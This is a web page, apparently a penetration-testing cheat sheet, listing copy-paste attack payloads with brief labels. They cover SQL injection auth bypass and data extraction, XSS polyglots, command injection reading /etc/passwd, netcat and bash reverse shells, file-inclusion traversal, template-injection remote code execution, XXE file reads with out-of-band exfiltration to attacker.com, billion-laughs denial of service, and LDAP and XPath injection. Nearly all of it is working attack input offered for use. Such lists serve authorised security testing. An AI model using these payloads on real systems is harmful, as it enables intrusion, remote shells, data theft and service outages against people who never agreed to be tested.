Pentest Cheatsheet

Payload Vending Machine

A massive collection of copy-paste payloads for SQLi, XSS, RCE, and more.

SQLi

Generic Auth Bypass

Classic tautology bypass

' OR 1=1 --
SQLi

Admin Auth Bypass

String based tautology

' OR '1'='1
SQLi

Username Auth Bypass

Comment out password check

admin' --
SQLi

Auth Bypass (Hash)

MySQL comment style

' OR '1'='1' #
SQLi

Auth Bypass (Union)

Union based login bypass

' UNION SELECT 1, 'admin', 'password' --
SQLi

Union Select Test

Test column count (3)

' UNION SELECT 1,2,3 --
SQLi

Union Select Version

Get DB version (MSSQL/MySQL)

' UNION SELECT @@version,2,3 --
SQLi

Union Select User

Get current user

' UNION SELECT user(),2,3 --
SQLi

Union Select Tables

List tables (MySQL)

' UNION SELECT table_name,2,3 FROM information_schema.tables --
SQLi

Error Based (Convert)

MSSQL conversion error

' AND 1=CONVERT(int, (SELECT @@version)) --
SQLi

Time Based (Sleep)

MSSQL 5 second delay

'; WAITFOR DELAY '0:0:5' --
SQLi

Time Based (Sleep MySQL)

MySQL 5 second delay

' AND SLEEP(5) --
SQLi

Time Based (PG Sleep)

PostgreSQL 5 second delay

'; SELECT pg_sleep(5); --
SQLi

Blind Boolean True

Should return normal page

' AND 1=1 --
SQLi

Blind Boolean False

Should return missing content

' AND 1=2 --
SQLi

SQLi Polyglot

Try to sleep in multiple contexts

SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
XSS

Basic Alert

Classic script tag

<script>alert(1)</script>
XSS

Basic Prompt

Prompt dialog

<script>prompt(1)</script>
XSS

Image OnError

Image tag error handler

<img src=x onerror=alert(1)>
XSS

SVG OnLoad

SVG load handler

<svg/onload=alert(1)>
XSS

Body OnLoad

Body load handler

<body onload=alert(1)>
XSS

XSS Polyglot

Breaks out of many contexts

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
XSS

XSS Polyglot Short

Break attribute and script

"><script>alert(1)</script>
XSS

Attribute Break

Break out of attribute

" onmouseover="alert(1)
XSS

Protocol Handler

URL protocol

javascript:alert(1)
XSS

AngularJS Template

Angular sandbox escape

{{constructor.constructor('alert(1)')()}}
XSS

VueJS Template

Vue sandbox escape

{{_openBlock.constructor('alert(1)')()}}
RCE

Unix List Files

Semicolon separator

; ls -la
RCE

Unix ID

Backtick execution

`id`
RCE

Unix Pipe

Pipe to command

| cat /etc/passwd
RCE

Unix Background

Background execution

& ping -c 10 127.0.0.1 &
RCE

Windows Dir

Windows separator

& dir
RCE

Windows IPConfig

OR operator

|| ipconfig
RCE

Blind Sleep (Unix)

Execution delay

; sleep 10
RCE

Blind Ping

Ping delay

; ping -c 10 127.0.0.1
RCE

Netcat Reverse Shell

Classic nc reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
RCE

Bash Reverse Shell

Bash TCP reverse shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
LFI

Etc Passwd

Standard traversal

../../../../../etc/passwd
LFI

Null Byte

Null byte bypass

../../../../../etc/passwd%00
LFI

Double Encoding

URL double encoding

%252e%252e%252fetc%252fpasswd
LFI

Windows Boot.ini

Windows boot config

../../../../../boot.ini
LFI

Windows Win.ini

Windows config

../../../../../windows/win.ini
LFI

PHP Filter Base64

Read source code

php://filter/convert.base64-encode/resource=index.php
LFI

PHP Input

Execute POST data

php://input
LFI

Data URI

Inline execution

data:text/plain,<?php system('id'); ?>
SSTI

Jinja2 Basic

Basic math test

{{7*7}}
SSTI

Jinja2 Config

Dump config

{{config.items()}}
SSTI

Jinja2 RCE

Python RCE (index varies)

{{''.__class__.__mro__[1].__subclasses__()[401]('whoami', shell=True, stdout=-1).communicate()}}
SSTI

Twig Basic

Basic math test

{{7*7}}
SSTI

Twig RCE

Twig RCE

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
SSTI

Java Basic

EL expression

${7*7}
SSTI

Spring RCE

Spring SpEL RCE

${T(java.lang.Runtime).getRuntime().exec('calc')}
XXE

XXE File Read

Basic file read

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><root>&test;</root>
XXE

XXE SSRF

Internal network probe

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "http://internal.service/">]><root>&test;</root>
XXE

Blind XXE OOB

Out of band exfiltration

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">%remote;]><root/>
XXE

Billion Laughs

DoS Attack

<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>
Misc

LDAP Bypass

Wildcard bypass

*
Misc

LDAP Admin

Logic bypass

admin)(|(&
Misc

XPath Bypass

XPath injection

' or '1'='1
Misc

Format String

Leak stack memory

%x %x %x %x